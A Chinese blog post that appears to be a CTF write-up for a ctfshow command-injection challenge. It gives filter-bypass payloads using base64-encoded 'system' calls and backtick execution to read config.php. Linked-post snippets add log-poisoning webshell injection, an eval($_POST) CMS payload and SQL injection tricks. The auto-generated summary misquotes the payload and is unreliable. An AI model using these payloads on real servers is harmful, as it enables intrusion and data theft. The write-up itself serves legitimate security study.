CTF web之旅 15

最新推荐文章于 2025-12-06 22:07:37 发布
原创 最新推荐文章于 2025-12-06 22:07:37 发布 · 88 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #linux #数据库 #javascript #运维

本文介绍了在CTF比赛中遇到的一个Web12挑战,涉及了文件名过滤与Base64编码的绕过策略。通过构造特定的payload,如使用`c=eval(base64_decode('system'));c('cat config.php'))`或利用反引号的优先执行特性来执行命令,成功获取到flag。该案例展示了在安全场景下对编码与命令注入的理解和应用。

ctf show 萌新web12

文件名也被过滤掉

base64绕过

 

 构造paylaod

?c=$a=base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b);

得到flag

或者是

对于反引号 在Linux中,`` 作用是优先执行里面的内容,再把里面的内容传给外面的语句。所以构造:

c=passthru("ca''t `ls`");
CTF之旅CTFHub技能树+详细Write up+已完结)(Web前置技能)
weixin_51563603的博客
08-07 5408
CTFHub新手之旅 首先我想稍微讲下个人经历,本人在今年寒假的时候初识CTF,当时还在攻防世界上做了一些题目,但是后来有人跟 我说攻防世界的题目比较老,建议我换个网站(这边没有诋毁攻防世界的意思,每个人有每个人的想法),后来也 因为学业较忙且基础太差无法开展此方面的学习,直到到了暑假,我自学完了一些编程语言包括Python、Java, 网页的前后端知识也有所了解后,我继续在CTFHub上了我的CTF之旅。 其实本人还是属于CTF小白,希望大家能够共同进步,那废话不多说开始看 Write Up 吧! We
CTF入门之旅(一)
qinyuehong的博客
02-23 359
我的CTF入门之旅(一) 题目是这个网址:http://123.206.87.240:8002/web5/ 打开网址题目是这样的,查看源代码,可以看到这是一道JS加密的题目,我用的是谷歌浏览器。右键之后点击查看源代码,得到如下图: 这道题目可以直接用浏览器的控制台解密,把模块中的源码复制到控制台中(谷歌浏览器的控制台可以在设置->更多工具->开发者工具) 点击回车,可以得到flag 将答案ctf{whatfk}输入,发现不对: 观察到题目中的字母都为大写,重新输入CTF{WHATFK}
CTF web之旅 19
weixin_45501486的博客
04-09 54
过滤掉php文件字 考虑为日志包含 掏出家伙扫 是nginx服务器 那就知道了日志目录了 nginx的日志文件默认地址在/var/log/nginx/access.log和/var/log/nginx/error.log, 访问access.log之后 看来是记录了get请求和user-agent 在bp中将一句话木马插入到useragent中 webshell连接 得到flag ...
CTF web之旅 34
weixin_45501486的博客
04-24 106
ctfshow web假赛生 看源码 需要name为admin 才可以输出flag 看到一个函数 preg_replace_callback 函数执行一个正则表达式搜索并且使用一个回调进行替换 知乎一哥们把回调解释的很清楚 就是说在$subject中搜索$pattern 如果匹配到 就调用回调函数$callback 结合本题来看就是在传入的c变量中匹配/\w\W*/ \w是匹配包括下...
CTF web之旅 28
weixin_45501486的博客
04-20 80
ctf show web 9 sql注入时可以用用御剑扫出源码文件 这是个新的做题思路 查询语句为 $sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'"; 重点在md5函数的处理上 以下是我看的这题讲的最深入的师傅 https://blog.youkuaiyun.com/March97/article/details/...
CTF web之旅 20
weixin_45501486的博客
04-09 74
ctfshow web3 php伪协议+文件包含漏洞 php:// 伪协议是用来 访问各个输入/输出流 php://input个可以访问请求的原始数据的只读流 也就是说获取post数据 其他伪协议这两个博客 ctf中php伪协议的利用 ctf中伪协议的利用 ?url=php://input bp 得到flag ...
CTF web之旅 24
weixin_45501486的博客
04-16 71
ctfshow89 preg_match函数是无法处理数组的 用数组可以绕过 intval函数 传入非空数组可绕过以上两个函数 ?num[]={1} ctf web90 传入16进制即可
CTF web之旅 33
weixin_45501486的博客
04-22 84
ctfshow 萌新赛 web签到 最基本的命令执行漏洞 分号分隔命令 payload: http://fd3589f8-9834-425b-83d6-c459c8abce77.challenge.ctf.show:8080?url=fd3589f8-9834-425b-83d6-c459c8abce77.challenge;ls;cat flag; ...
CTF web之旅 17
weixin_45501486的博客
04-01 64
ctfshow web14 15萌新 用post传参可以绕过过滤 ?c=echo `$_POST[a]`?>再post传参 a=cat config.php 或者php伪协议 ?c=include $_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=config.php 再base64解码得到flag w...
CTF web之旅 7
weixin_45501486的博客
03-01 90
题目名称: 百度杯”CTF比赛 九月场 test 看了大佬的wp之后才知道是 海洋CMS漏洞 CMS就是内容管理系统 构造url /search.php?searchtype=5&tid=&area=eval($_POST[1]) 蚁剑连接 进去扒扒数据 找不到flag啊 在这个目录里看一下数据库配置信息 /var/www/html/data/common.inc.php...
CTF web之旅 29
weixin_45501486的博客
04-21 78
ctfshow web10 这个姿势就比较骚了 利用sql语法可以产生空值 即为判断空等于空 绕过 group by 列名 会对该字段进行逻辑排列 再加上 with rollup表示在进行分组统计的基础上再次进行汇总统计 对于passwor的这一字段 汇总统计是为空的 对计数函数count(*)才可以进行group by逻辑排列和with rollup汇总统计 password是不行的 当循...
ctf拼图例题-puzzle
04-13
CTF(Capture The Flag)竞赛中,"puzzle"是一种常见的挑战类型,它涉及到解决各种谜题以获取关键信息或解密数据。本资源包包含了一组与CTF拼图相关的...通过这些图片,参赛者将踏上一段充满智慧和趣味的解谜之旅
CTFWEB入门的SQL注入web171
沐一 · 林 的博客
09-06 1109
CTFWEB入门的SQL注入web171 继续开启全栈梦想之逆向之旅~ 这题是 CTFWEB入门的SQL注入web171
Vue 通用复选框组互斥 Hooks:兼容 Element Plus + Ant Design Vue
a3212768093的博客
12-02 851
本文介绍了一个通用的Vue Hooks useExclusiveCheckbox,用于实现复选框组的互斥选择功能。该Hooks兼容ElementPlus和AntDesignVue两大UI库,主要特点包括:跨UI库兼容、轻量无依赖、灵活配置互斥选项值、全场景适配和类型安全。核心逻辑通过对比新旧选中值数组,自动处理互斥选项与其他选项的切换关系。文章提供了完整代码和使用示例,分别演示了在ElementPlus和AntDesignVue中的实现方式,并解答了常见问题。该方案可显著提升开发效率,适用于各类需要互斥选择
深度解析前端input标签:从默认样式覆盖到浏览器自动填充和兼容以及文本域
鹏多多的博客
12-03 981
HTML表单中的<input>标签是核心交互元素,支持多种输入类型(如文本、密码、单选、文件上传等),通过type属性定义不同功能。其核心属性包括数据标识(name/id)、状态控制(disabled/readonly)、验证限制(pattern/maxlength)和交互优化(autofocus/autocomplete)。浏览器默认样式存在兼容性问题,可通过CSS重置实现统一外观,特别是对单选/复选框需要特殊样式覆盖处理。自动填充功能基于name属性和表单上下文触发,可通过autocompl
前端仿真驱动创新:西门子FLOEFD的行业价值与应用指南
anscos的博客
12-05 1054
西门子Simcenter FLOEFD作为嵌入CAD的CFD解决方案,精准击中了现代研发“高效迭代、精准预判”的核心需求,其技术革新与应用实践为多行业带来了研发模式的重构,成为高端装备设计不可或缺的核心工具。西门子FLOEFD以“CAD原生、智能高效、多场协同”为核心,打破了设计与仿真的壁垒,尤其适配新能源、电子、增材制造等快速迭代的行业。其价值不仅在于缩短研发周期、降低试验成本,更在于推动工程师将“仿真思维”融入设计全流程,实现从“经验驱动”到“数据驱动”的转型。
学Java第五十三天——IO综合练习(1)
最新发布
weixin_67566799的博客
12-06 256
是用的糊涂包Hutool,其余的。完整的获取姓氏的代码。
ruoyi集成camunda实现bpmn在线设计器
xrl2012的专栏
12-03 1190
摘要: 本文介绍了如何在RuoYi-Vue2前端集成Camunda BPMN在线设计器,实现流程建模功能。通过npm安装bpmn-js等依赖包,配置vue.config.js解决转译和别名问题,并提供了测试页面代码示例。页面包含导入/导出XML/SVG、流程检查、部署等功能,支持BPMN流程设计器的初始化和基本操作。环境要求包括JDK 1.8+、MySQL 5.7+、Node 23+等。完整方案可参考若依工作流。
多层环形图,自定义tooltip
好记性,不如烂键盘。
12-05 563
多层环形图,自定义tooltip。
探索我的CTF挑战与信息安全之旅
1. Jeopardy(解题模式):参赛队伍在规定时间内解答尽可能多的题目,通常每个题目会有一个与之相关的flag。每答对一题,就能获得一定的分数。这种模式更侧重于考验参赛者的知识广度和深度。 2. Attack-Defense...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值